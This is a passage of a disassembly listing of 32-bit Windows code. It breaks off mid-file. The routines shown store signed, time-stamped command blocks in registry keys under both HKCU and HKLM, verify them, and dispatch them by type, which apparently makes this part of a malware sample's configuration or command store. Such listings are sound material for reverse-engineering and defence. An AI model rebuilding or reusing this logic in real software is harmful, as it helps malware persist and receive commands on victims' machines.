lpData = dword ptr 10h
cbData = dword ptr 14h
push ebp
mov ebp, esp
push esi
push [ebp+cbData] ; cbData
push [ebp+lpData] ; lpData
push [ebp+lpValueName] ; lpValueName
push [ebp+lpSubKey] ; lpSubKey
push 80000001h ; hKey
call sub_9A8419
push [ebp+cbData] ; cbData
mov esi, eax
push [ebp+lpData] ; lpData
push [ebp+lpValueName] ; lpValueName
push [ebp+lpSubKey] ; lpSubKey
push 80000002h ; hKey
call sub_9A8419
add esp, 28h
test eax, eax
jz short loc_9A84DC
xor esi, esi
inc esi
loc_9A84DC: ; CODE XREF: sub_9A84A0+37�j
mov eax, esi
pop esi
pop ebp
retn
sub_9A84A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A84E1 proc near ; CODE XREF: sub_9A8B47+25�p
var_10 = dword ptr -10h
hMem = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+hMem]
push eax
push (offset aPurlmon_dll+9)
push offset aStance ; "stance"
lea eax, [ebp+var_10]
call sub_9A8462
add esp, 0Ch
test eax, eax
jnz short loc_9A8507
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_9A8507: ; CODE XREF: sub_9A84E1+21�j
push esi
mov esi, [ebp+hMem]
mov eax, [esi]
lea ecx, [eax+eax*2]
lea ecx, ds:4[ecx*4]
cmp [ebp+var_10], ecx
jz short loc_9A8520
xor eax, eax
jmp short loc_9A8576
; ---------------------------------------------------------------------------
loc_9A8520: ; CODE XREF: sub_9A84E1+39�j
and [ebp+var_8], 0
test eax, eax
jbe short loc_9A8565
lea eax, [esi+4]
mov [ebp+var_4], eax
push edi
loc_9A852F: ; CODE XREF: sub_9A84E1+81�j
push 14h ; dwBytes
push 40h ; uFlags
call GlobalAlloc
test eax, eax
jz short loc_9A8556
mov esi, [ebp+var_4]
lea edi, [eax+8]
movsd
movsd
movsd
mov ecx, [ebx+4]
mov esi, [ebp+hMem]
mov [eax], ebx
mov [eax+4], ecx
mov [ecx], eax
mov [ebx+4], eax
loc_9A8556: ; CODE XREF: sub_9A84E1+5A�j
inc [ebp+var_8]
mov eax, [ebp+var_8]
add [ebp+var_4], 0Ch
cmp eax, [esi]
jb short loc_9A852F
pop edi
loc_9A8565: ; CODE XREF: sub_9A84E1+45�j
mov eax, [esi]
mov ecx, [ebp+arg_0]
push esi ; hMem
mov [ecx], eax
call GlobalFree
xor eax, eax
inc eax
loc_9A8576: ; CODE XREF: sub_9A84E1+3D�j
pop esi
leave
retn
sub_9A84E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8579 proc near ; CODE XREF: sub_9A8BC6+33�p
; sub_9A8C17+2D�p
cbData = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, [ebp+arg_4]
lea eax, [esi+esi*2]
lea eax, ds:4[eax*4]
push eax ; dwBytes
push 40h ; uFlags
mov [ebp+cbData], eax
call GlobalAlloc
mov ebx, eax
test ebx, ebx
jz short loc_9A8602
mov edx, [ebp+arg_0]
mov [ebx], esi
mov eax, [edx]
push edi
lea esi, [eax+8]
lea edi, [ebx+4]
movsd
xor ecx, ecx
movsd
inc ecx
cmp [ebp+arg_4], ecx
movsd
jbe short loc_9A85E0
lea esi, [ebx+10h]
mov [ebp+var_4], esi
loc_9A85BE: ; CODE XREF: sub_9A8579+5C�j
mov eax, [eax]
cmp eax, edx
jz short loc_9A85D9
mov edi, [ebp+var_4]
add [ebp+var_4], 0Ch
lea esi, [eax+8]
movsd
movsd
inc ecx
cmp ecx, [ebp+arg_4]
movsd
jb short loc_9A85BE
jmp short loc_9A85E0
; ---------------------------------------------------------------------------
loc_9A85D9: ; CODE XREF: sub_9A8579+49�j
cmp ecx, [ebp+arg_4]
jz short loc_9A85E0
mov [ebx], ecx
loc_9A85E0: ; CODE XREF: sub_9A8579+3D�j
; sub_9A8579+5E�j ...
push [ebp+cbData] ; cbData
push ebx ; lpData
push (offset aPurlmon_dll+9) ; lpValueName
push offset aStance ; "stance"
call sub_9A84A0
add esp, 10h
push ebx ; hMem
mov esi, eax
call GlobalFree
mov eax, esi
pop edi
loc_9A8602: ; CODE XREF: sub_9A8579+24�j
pop esi
pop ebx
leave
retn
sub_9A8579 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8606(LPFILETIME lpFileTime)
sub_9A8606 proc near ; CODE XREF: sub_9A8625+3B�p
; sub_9A87A6+9�p
SystemTime = _SYSTEMTIME ptr -10h
lpFileTime = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
call GetSystemTime
push [ebp+lpFileTime] ; lpFileTime
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
call SystemTimeToFileTime
leave
retn
sub_9A8606 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8625 proc near ; CODE XREF: sub_9A8C17+1F�p
FileTime = _FILETIME ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [esi]
jmp short loc_9A8635
; ---------------------------------------------------------------------------
loc_9A862E: ; CODE XREF: sub_9A8625+12�j
cmp [eax+8], ebx
jz short loc_9A863B
mov eax, [eax]
loc_9A8635: ; CODE XREF: sub_9A8625+7�j
cmp eax, esi
jnz short loc_9A862E
xor eax, eax
loc_9A863B: ; CODE XREF: sub_9A8625+C�j
test eax, eax
jz short loc_9A865C
mov ecx, [eax+4]
mov edx, [eax]
mov [ecx], edx
mov ecx, [eax]
mov edx, [eax+4]
mov [ecx+4], edx
mov ecx, [esi]
mov [eax], ecx
mov [eax+4], esi
mov [esi], eax
mov [eax+4], eax
jmp short loc_9A8693
; ---------------------------------------------------------------------------
loc_9A865C: ; CODE XREF: sub_9A8625+18�j
lea eax, [ebp+FileTime]
push eax ; lpFileTime
call sub_9A8606
pop ecx
push 14h ; dwBytes
push 40h ; uFlags
call GlobalAlloc
test eax, eax
jnz short loc_9A8676
leave
retn
; ---------------------------------------------------------------------------
loc_9A8676: ; CODE XREF: sub_9A8625+4D�j
mov [eax+8], ebx
mov ecx, [ebp+FileTime.dwLowDateTime]
mov [eax+0Ch], ecx
mov ecx, [ebp+FileTime.dwHighDateTime]
mov [eax+10h], ecx
mov ecx, [esi]
mov [eax], ecx
mov [eax+4], esi
mov [ecx+4], eax
mov [esi], eax
inc dword ptr [edi]
loc_9A8693: ; CODE XREF: sub_9A8625+35�j
xor eax, eax
inc eax
leave
retn
sub_9A8625 endp
; =============== S U B R O U T I N E =======================================
sub_9A8698 proc near ; CODE XREF: sub_9A8B47+69�p
arg_0 = dword ptr 4
push 0Ch ; dwBytes
push 40h ; uFlags
call GlobalAlloc
xor ecx, ecx
cmp eax, ecx
jz short loc_9A86BA
mov [eax], ecx
mov [eax+8], ecx
mov [eax+4], ecx
mov ecx, [esp+arg_0]
mov [ecx], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A86BA: ; CODE XREF: sub_9A8698+E�j
xor eax, eax
retn
sub_9A8698 endp
; =============== S U B R O U T I N E =======================================
sub_9A86BD proc near ; CODE XREF: sub_9A86E4+10�p
; sub_9A89A9+20�p
arg_0 = dword ptr 4
mov eax, [edi+10h]
add eax, 14h
push eax ; dwBytes
push 40h ; uFlags
mov [esi], eax
call GlobalAlloc
mov ecx, [esp+arg_0]
mov [ecx], eax
push dword ptr [esi] ; Size
push edi ; Src
push eax ; Dst
call memcpy
xor eax, eax
add esp, 0Ch
inc eax
retn
sub_9A86BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A86E4 proc near ; CODE XREF: sub_9A8745+2E�p
Size = dword ptr -8
hMem = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
lea eax, [ebp+hMem]
push eax
lea esi, [ebp+Size]
mov edi, ecx
call sub_9A86BD
test eax, eax
pop ecx
jz short loc_9A8741
mov esi, [ebp+hMem]
mov eax, [esi+10h]
lea ecx, [eax-200h]
push ecx ; int
lea ecx, [esi+14h]
push ecx ; int
lea eax, [eax+esi-1ECh]
push eax ; int
push dword_9BAB20 ; int
push offset dword_9BAB28 ; Src
call sub_9AF464
push [ebp+Size] ; Size
movzx edi, al
push 0 ; Val
push esi ; Dst
call memset
add esp, 20h
push esi ; hMem
call GlobalFree
mov eax, edi
loc_9A8741: ; CODE XREF: sub_9A86E4+18�j
pop edi
pop esi
leave
retn
sub_9A86E4 endp
; =============== S U B R O U T I N E =======================================
sub_9A8745 proc near ; CODE XREF: sub_9A8AD0+D�p
; sub_9A8B47+50�p
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
xor esi, esi
cmp [esp+8+arg_0], 0Ch
jbe short loc_9A8787
mov eax, [edi+4]
add eax, 0Ch
cmp eax, [esp+8+arg_0]
jnz short loc_9A8787
cmp [edi], ebx
jbe short loc_9A8781
loc_9A8762: ; CODE XREF: sub_9A8745+3A�j
lea ecx, [edi+esi+0Ch]
mov eax, [ecx+10h]
lea esi, [esi+eax+14h]
cmp esi, [esp+8+arg_0]
ja short loc_9A8787
call sub_9A86E4
test eax, eax
jz short loc_9A8787
inc ebx
cmp ebx, [edi]
jb short loc_9A8762
loc_9A8781: ; CODE XREF: sub_9A8745+1B�j
xor eax, eax
inc eax
loc_9A8784: ; CODE XREF: sub_9A8745+44�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9A8787: ; CODE XREF: sub_9A8745+B�j
; sub_9A8745+17�j ...
xor eax, eax
jmp short loc_9A8784
sub_9A8745 endp
; =============== S U B R O U T I N E =======================================
sub_9A878B proc near ; CODE XREF: sub_9A8AD0+3F�p
; sub_9A8AD0+58�p ...
mov ecx, [eax+4]
add ecx, 0Ch
push ecx ; cbData
push eax ; lpData
push offset dword_9A2650 ; lpValueName
push offset byte_9A261C ; lpSubKey
call sub_9A84A0
add esp, 10h
retn
sub_9A878B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A87A6 proc near ; CODE XREF: sub_9A8881+25�p
; sub_9A8881+76�p ...
FileTime = _FILETIME ptr -8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+FileTime]
push eax ; lpFileTime
call sub_9A8606
mov eax, [ebp+FileTime.dwHighDateTime]
cmp eax, [esi+0Ch]
pop ecx
jb short loc_9A87CC
ja short loc_9A87C7
mov eax, [ebp+FileTime.dwLowDateTime]
cmp eax, [esi+8]
jbe short loc_9A87CC
loc_9A87C7: ; CODE XREF: sub_9A87A6+17�j
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_9A87CC: ; CODE XREF: sub_9A87A6+15�j
; sub_9A87A6+1F�j
xor eax, eax
leave
retn
sub_9A87A6 endp
; =============== S U B R O U T I N E =======================================
sub_9A87D0 proc near ; CODE XREF: sub_9A87FB+9�p
; sub_9A8948+22�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [edx]
push edi
xor edi, edi
xor ecx, ecx
test esi, esi
jbe short loc_9A87F5
loc_9A87DD: ; CODE XREF: sub_9A87D0+23�j
lea eax, [edx+ecx+0Ch]
mov ebx, [eax]
cmp ebx, [esp+0Ch+arg_0]
jz short loc_9A87F7
mov eax, [eax+10h]
inc edi
cmp edi, esi
lea ecx, [ecx+eax+14h]
jb short loc_9A87DD
loc_9A87F5: ; CODE XREF: sub_9A87D0+B�j
xor eax, eax
loc_9A87F7: ; CODE XREF: sub_9A87D0+17�j
pop edi
pop esi
pop ebx
retn
sub_9A87D0 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A87FB(void *Src)
sub_9A87FB proc near ; CODE XREF: sub_9A8881+8D�p
; sub_9A8948+30�p
Src = dword ptr 4
mov edx, [esi]
push edi
mov edi, [esp+4+Src]
push dword ptr [edi]
call sub_9A87D0
test eax, eax
pop ecx
jz short loc_9A8812
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_9A8812: ; CODE XREF: sub_9A87FB+11�j
mov eax, [edx+4]
push ebx
mov ebx, [edi+10h]
add ebx, 14h
lea eax, [eax+ebx+0Ch]
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
test edi, edi
jz short loc_9A887E
mov eax, [esi]
mov eax, [eax]
inc eax
mov [edi], eax
mov eax, [esi]
mov eax, [eax+8]
mov [edi+8], eax
mov eax, [esi]
mov eax, [eax+4]
add eax, ebx
mov [edi+4], eax
mov eax, [esi]
push dword ptr [eax+4] ; Size
add eax, 0Ch
push eax ; Src
lea eax, [edi+0Ch]
push eax ; Dst
call memcpy
mov eax, [esi]
mov eax, [eax+4]
push ebx ; Size
push [esp+18h+Src] ; Src
lea eax, [eax+edi+0Ch]
push eax ; Dst
call memcpy
add esp, 18h
push dword ptr [esi] ; hMem
call GlobalFree
xor eax, eax
mov [esi], edi
inc eax
loc_9A887E: ; CODE XREF: sub_9A87FB+32�j
pop ebx
pop edi
retn
sub_9A87FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8881 proc near ; CODE XREF: sub_9A8948+54�p
hMem = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [edi]
push ebx
xor ebx, ebx
cmp [eax], ebx
push esi
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jbe short loc_9A88BC
loc_9A8897: ; CODE XREF: sub_9A8881+37�j
mov eax, [edi]
mov ecx, [ebp+var_4]
lea esi, [eax+ecx+0Ch]
mov ebx, [esi+10h]
add ebx, 14h
call sub_9A87A6
add [ebp+var_4], ebx
inc [ebp+var_8]
mov eax, [edi]
mov ecx, [ebp+var_8]
cmp ecx, [eax]
jb short loc_9A8897
xor ebx, ebx
loc_9A88BC: ; CODE XREF: sub_9A8881+14�j
push 0Ch ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov esi, eax
cmp esi, ebx
mov [ebp+hMem], esi
jz short loc_9A8944
mov [esi], ebx
mov [esi+4], ebx
mov eax, [edi]
mov eax, [eax+8]
mov [esi+8], eax
mov eax, [edi]
cmp [eax], ebx
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jbe short loc_9A892A
loc_9A88E8: ; CODE XREF: sub_9A8881+A4�j
mov eax, [edi]
mov ecx, [ebp+var_4]
lea esi, [eax+ecx+0Ch]
mov ebx, [esi+10h]
add ebx, 14h
call sub_9A87A6
test eax, eax
jnz short loc_9A8918
mov eax, [edi]
mov ecx, [esi+4]
cmp ecx, [eax+8]
jb short loc_9A8918
push esi ; Src
lea esi, [ebp+hMem]
call sub_9A87FB
test eax, eax
pop ecx
jz short loc_9A893B
loc_9A8918: ; CODE XREF: sub_9A8881+7D�j
; sub_9A8881+87�j
add [ebp+var_4], ebx
inc [ebp+var_8]
mov eax, [edi]
mov ecx, [ebp+var_8]
cmp ecx, [eax]
jb short loc_9A88E8
mov esi, [ebp+hMem]
loc_9A892A: ; CODE XREF: sub_9A8881+65�j
push dword ptr [edi] ; hMem
call GlobalFree
xor eax, eax
mov [edi], esi
inc eax
loc_9A8937: ; CODE XREF: sub_9A8881+C5�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9A893B: ; CODE XREF: sub_9A8881+95�j
push [ebp+hMem] ; hMem
call GlobalFree
loc_9A8944: ; CODE XREF: sub_9A8881+4C�j
xor eax, eax
jmp short loc_9A8937
sub_9A8881 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8948 proc near ; CODE XREF: sub_9A8AD0+49�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp [esi], ebx
push edi
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jbe short loc_9A8999
loc_9A895F: ; CODE XREF: sub_9A8948+4F�j
mov eax, [ebp+arg_0]
mov edx, [eax]
lea edi, [esi+ebx+0Ch]
push dword ptr [edi]
call sub_9A87D0
test eax, eax
pop ecx
jnz short loc_9A8988
mov esi, [ebp+arg_0]
push edi ; Src
call sub_9A87FB
mov esi, [ebp+arg_4]
pop ecx
mov [ebp+var_8], 1
loc_9A8988: ; CODE XREF: sub_9A8948+2A�j
mov eax, [edi+10h]
inc [ebp+var_4]
lea ebx, [ebx+eax+14h]
mov eax, [ebp+var_4]
cmp eax, [esi]
jb short loc_9A895F
loc_9A8999: ; CODE XREF: sub_9A8948+15�j
mov edi, [ebp+arg_0]
call sub_9A8881
mov eax, [ebp+var_8]
pop edi
pop esi
pop ebx
leave
retn
sub_9A8948 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A89A9 proc near ; CODE XREF: sub_9A8A65+39�p
Size = dword ptr -8
hMem = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push edi
mov edi, eax
cmp dword ptr [edi+10h], 200h
ja short loc_9A89C1
xor eax, eax
jmp loc_9A8A62
; ---------------------------------------------------------------------------
loc_9A89C1: ; CODE XREF: sub_9A89A9+F�j
push esi
lea eax, [ebp+hMem]
push eax
lea esi, [ebp+Size]
call sub_9A86BD
test eax, eax
pop ecx
jz loc_9A8A61
mov edi, [ebp+hMem]
mov eax, [edi+10h]
lea ecx, [eax-200h]
push ecx ; int
lea esi, [edi+14h]
push esi ; int
lea eax, [eax+edi-1ECh]
push eax ; int
push dword_9BAB20 ; int
push offset dword_9BAB28 ; Src
call sub_9AF464
add esp, 14h
test al, al
jnz short loc_9A8A0B
xor esi, esi
jmp short loc_9A8A58
; ---------------------------------------------------------------------------
loc_9A8A0B: ; CODE XREF: sub_9A89A9+5C�j
mov eax, [esi]
push ebx
xor ebx, ebx
dec eax
jz short loc_9A8A32
dec eax
jnz short loc_9A8A47
mov eax, [esi+4]
not eax
push 1 ; int
and eax, 1
push eax ; int
push dword ptr [esi+8] ; int
add esi, 0Ch
push esi ; Src
call sub_9A81B2
add esp, 10h
jmp short loc_9A8A40
; ---------------------------------------------------------------------------
loc_9A8A32: ; CODE XREF: sub_9A89A9+68�j
push dword ptr [esi+8] ; nNumberOfBytesToWrite
add esi, 0Ch
push esi ; lpBuffer
call sub_9AD473
pop ecx
pop ecx
loc_9A8A40: ; CODE XREF: sub_9A89A9+87�j
test eax, eax
jz short loc_9A8A47
xor ebx, ebx
inc ebx
loc_9A8A47: ; CODE XREF: sub_9A89A9+6B�j
; sub_9A89A9+99�j
push [ebp+Size] ; Size
push 0 ; Val
push edi ; Dst
call memset
add esp, 0Ch
mov esi, ebx
pop ebx
loc_9A8A58: ; CODE XREF: sub_9A89A9+60�j
push edi ; hMem
call GlobalFree
mov eax, esi
loc_9A8A61: ; CODE XREF: sub_9A89A9+28�j
pop esi
loc_9A8A62: ; CODE XREF: sub_9A89A9+13�j
pop edi
leave
retn
sub_9A89A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8A65 proc near ; CODE XREF: sub_9A8AD0+2F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push edi
xor edi, edi
cmp [ebx], edi
mov [ebp+var_8], edi
mov [ebp+var_4], edi
jbe short loc_9A8ACA
push esi
loc_9A8A78: ; CODE XREF: sub_9A8A65+62�j
mov edx, [ebp+arg_0]
mov eax, [edx+8]
lea esi, [ebx+edi+0Ch]
cmp eax, [esi+4]
ja short loc_9A8AB8
push dword ptr [esi]
call sub_9A87D0
test eax, eax
pop ecx
jnz short loc_9A8AB8
call sub_9A87A6
test eax, eax
jnz short loc_9A8AB8
mov eax, esi
call sub_9A89A9
test eax, eax
mov [ebp+var_8], eax
jz short loc_9A8AB8
mov eax, [esi+4]
mov ecx, [ebp+arg_0]
cmp [ecx+8], eax
jnb short loc_9A8AB8
mov [ecx+8], eax
loc_9A8AB8: ; CODE XREF: sub_9A8A65+20�j
; sub_9A8A65+2C�j ...
mov eax, [esi+10h]
inc [ebp+var_4]
lea edi, [edi+eax+14h]
mov eax, [ebp+var_4]
cmp eax, [ebx]
jb short loc_9A8A78
pop esi
loc_9A8ACA: ; CODE XREF: sub_9A8A65+10�j
mov eax, [ebp+var_8]
pop edi
leave
retn
sub_9A8A65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8AD0(LPCRITICAL_SECTION lpCriticalSection,int,int,int)
sub_9A8AD0 proc near ; CODE XREF: sub_9A8FC6+2E�p
lpCriticalSection= dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push edi
push [ebp+arg_8]
mov edi, ebx
call sub_9A8745
test eax, eax
pop ecx
jz short loc_9A8B43
push esi
mov esi, [ebp+lpCriticalSection]
push esi ; lpCriticalSection
call EnterCriticalSection
and [ebp+arg_4], 0
cmp [ebp+arg_C], 0
jz short loc_9A8B14
push dword ptr [esi+3Ch]
call sub_9A8A65
test eax, eax
pop ecx
mov [ebp+arg_4], eax
jz short loc_9A8B14
mov eax, [esi+3Ch]
call sub_9A878B
loc_9A8B14: ; CODE XREF: sub_9A8AD0+2A�j
; sub_9A8AD0+3A�j
lea edi, [esi+3Ch]
push ebx
push edi
call sub_9A8948
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz short loc_9A8B2F
mov eax, [edi]
call sub_9A878B
mov ebx, eax
loc_9A8B2F: ; CODE XREF: sub_9A8AD0+54�j
push esi ; lpCriticalSection
call LeaveCriticalSection
xor eax, eax
cmp ebx, eax
pop esi
jz short loc_9A8B43
cmp [ebp+arg_4], eax
jz short loc_9A8B43
inc eax
loc_9A8B43: ; CODE XREF: sub_9A8AD0+15�j
; sub_9A8AD0+6B�j ...
pop edi
pop ebx
pop ebp
retn
sub_9A8AD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8B47(LPCRITICAL_SECTION lpCriticalSection)
sub_9A8B47 proc near ; CODE XREF: StartAddress+1F�p
hMem = dword ptr -4
lpCriticalSection= dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+lpCriticalSection]
push edi
mov edi, InitializeCriticalSection
lea ebx, [esi+30h]
push esi ; lpCriticalSection
mov [ebx+4], ebx
mov [ebx], ebx
call edi ; InitializeCriticalSection
lea eax, [esi+18h]
push eax ; lpCriticalSection
call edi ; InitializeCriticalSection
lea eax, [esi+38h]
push eax
call sub_9A84E1
lea eax, [ebp+hMem]
push eax
push offset dword_9A2650
push offset byte_9A261C
lea eax, [ebp+lpCriticalSection]
lea ebx, [esi+3Ch]
call sub_9A8462
add esp, 10h
test eax, eax
jz short loc_9A8BAF
push [ebp+lpCriticalSection]
mov edi, [ebp+hMem]
call sub_9A8745
test eax, eax
pop ecx
jz short loc_9A8BA8
xor eax, eax
mov [ebx], edi
inc eax
jmp short loc_9A8BB6
; ---------------------------------------------------------------------------
loc_9A8BA8: ; CODE XREF: sub_9A8B47+58�j
push edi ; hMem
call GlobalFree
loc_9A8BAF: ; CODE XREF: sub_9A8B47+48�j
push ebx
call sub_9A8698
pop ecx
loc_9A8BB6: ; CODE XREF: sub_9A8B47+5F�j
pop edi
mov [esi+40h], eax
pop esi
pop ebx
leave
retn
sub_9A8B47 endp
; =============== S U B R O U T I N E =======================================
sub_9A8BBE proc near ; CODE XREF: sub_9AF7D5+190�p
; sub_9AFD0A+4C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax+40h]
retn
sub_9A8BBE endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A8BC6(LPCRITICAL_SECTION lpCriticalSection)
sub_9A8BC6 proc near ; CODE XREF: StartAddress+1F0�p
lpCriticalSection= dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+lpCriticalSection]
push edi
mov edi, EnterCriticalSection
push esi ; lpCriticalSection
call edi ; EnterCriticalSection
mov eax, [esi+3Ch]
call sub_9A878B
mov ebx, LeaveCriticalSection
push esi ; lpCriticalSection
mov [esp+14h+lpCriticalSection], eax
call ebx ; LeaveCriticalSection
lea ebp, [esi+18h]
push ebp ; lpCriticalSection
call edi ; EnterCriticalSection
push dword ptr [esi+38h]
add esi, 30h
push esi
call sub_9A8579
pop ecx
pop ecx
push ebp ; lpCriticalSection
mov esi, eax
call ebx ; LeaveCriticalSection
xor eax, eax
cmp [esp+10h+lpCriticalSection], eax
jz short loc_9A8C12
cmp esi, eax
jz short loc_9A8C12
inc eax
loc_9A8C12: ; CODE XREF: sub_9A8BC6+45�j
; sub_9A8BC6+49�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_9A8BC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8C17(LPCRITICAL_SECTION lpCriticalSection,int)
sub_9A8C17 proc near ; CODE XREF: sub_9A9067+4B�p
; sub_9AF7D5+3EE�p
lpCriticalSection= dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+lpCriticalSection]
lea eax, [esi+18h]
push edi
push eax ; lpCriticalSection
mov [ebp+lpCriticalSection], eax
call EnterCriticalSection
mov ebx, [ebp+arg_4]
lea edi, [esi+38h]
add esi, 30h
call sub_9A8625
mov ebx, eax
test ebx, ebx
jz short loc_9A8C4D
push dword ptr [edi]
push esi
call sub_9A8579
pop ecx
pop ecx
mov ebx, eax
loc_9A8C4D: ; CODE XREF: sub_9A8C17+28�j
push [ebp+lpCriticalSection] ; lpCriticalSection
call LeaveCriticalSection
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn
sub_9A8C17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8C5D(LPCRITICAL_SECTION lpCriticalSection,int)
sub_9A8C5D proc near ; CODE XREF: StartAddress+1EA�p
lpCriticalSection= dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+lpCriticalSection]
lea eax, [esi+18h]
push eax ; lpCriticalSection
mov [ebp+lpCriticalSection], eax
call EnterCriticalSection
mov eax, [ebp+arg_4]
cmp eax, [esi+38h]
lea ebx, [esi+30h]
ja short loc_9A8CAA
push edi
mov edi, [ebx+4]
jmp short loc_9A8CA5
; ---------------------------------------------------------------------------
loc_9A8C83: ; CODE XREF: sub_9A8C5D+4A�j
mov eax, [ebp+arg_4]
cmp [esi+38h], eax
jbe short loc_9A8CA9
mov edx, edi
mov ecx, [edx]
lea eax, [edi+4]
mov edi, [eax]
mov eax, edi
mov [eax], ecx
push edx ; hMem
mov [ecx+4], eax
call GlobalFree
dec dword ptr [esi+38h]
loc_9A8CA5: ; CODE XREF: sub_9A8C5D+24�j
cmp edi, ebx
jnz short loc_9A8C83
loc_9A8CA9: ; CODE XREF: sub_9A8C5D+2C�j
pop edi
loc_9A8CAA: ; CODE XREF: sub_9A8C5D+1E�j
push [ebp+lpCriticalSection] ; lpCriticalSection
call LeaveCriticalSection
pop esi
pop ebx
pop ebp
retn
sub_9A8C5D endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A8CB7(LPCRITICAL_SECTION lpCriticalSection,int,int)
sub_9A8CB7 proc near ; CODE XREF: sub_9AF7D5+27B�p
lpCriticalSection= dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push edi
mov edi, [esp+8+lpCriticalSection]
push edi ; lpCriticalSection
xor ebx, ebx
call EnterCriticalSection
mov eax, [edi+3Ch]
test eax, eax
jz short loc_9A8CFC
push esi
mov esi, [eax+4]
add esi, 0Ch
push esi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
test eax, eax
mov ecx, [esp+0Ch+arg_4]
mov [ecx], eax
jz short loc_9A8CFB
push esi ; Size
push dword ptr [edi+3Ch] ; Src
push eax ; Dst
call memcpy
mov eax, [esp+18h+arg_8]
add esp, 0Ch
mov [eax], esi
inc ebx
loc_9A8CFB: ; CODE XREF: sub_9A8CB7+2E�j
pop esi
loc_9A8CFC: ; CODE XREF: sub_9A8CB7+14�j
push edi ; lpCriticalSection
call LeaveCriticalSection
pop edi
mov eax, ebx
pop ebx
retn
sub_9A8CB7 endp
; =============== S U B R O U T I N E =======================================
sub_9A8D08 proc near ; CODE XREF: sub_9A8F28+1C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
lea ebx, [esi+18h]
push ebx ; lpCriticalSection
call EnterCriticalSection
lea edi, [esi+30h]
mov esi, [edi]
jmp short loc_9A8D2F
; ---------------------------------------------------------------------------
loc_9A8D20: ; CODE XREF: sub_9A8D08+29�j
push [esp+0Ch+arg_8]
push dword ptr [esi+8]
call [esp+14h+arg_4]
mov esi, [esi]
pop ecx
pop ecx
loc_9A8D2F: ; CODE XREF: sub_9A8D08+16�j
cmp esi, edi
jnz short loc_9A8D20
push ebx ; lpCriticalSection
call LeaveCriticalSection
pop edi
pop esi
pop ebx
retn
sub_9A8D08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8D3E(char *Dest,size_t Count)
sub_9A8D3E proc near ; CODE XREF: sub_9A8D7E+16�p
; sub_9A90F2+18�p
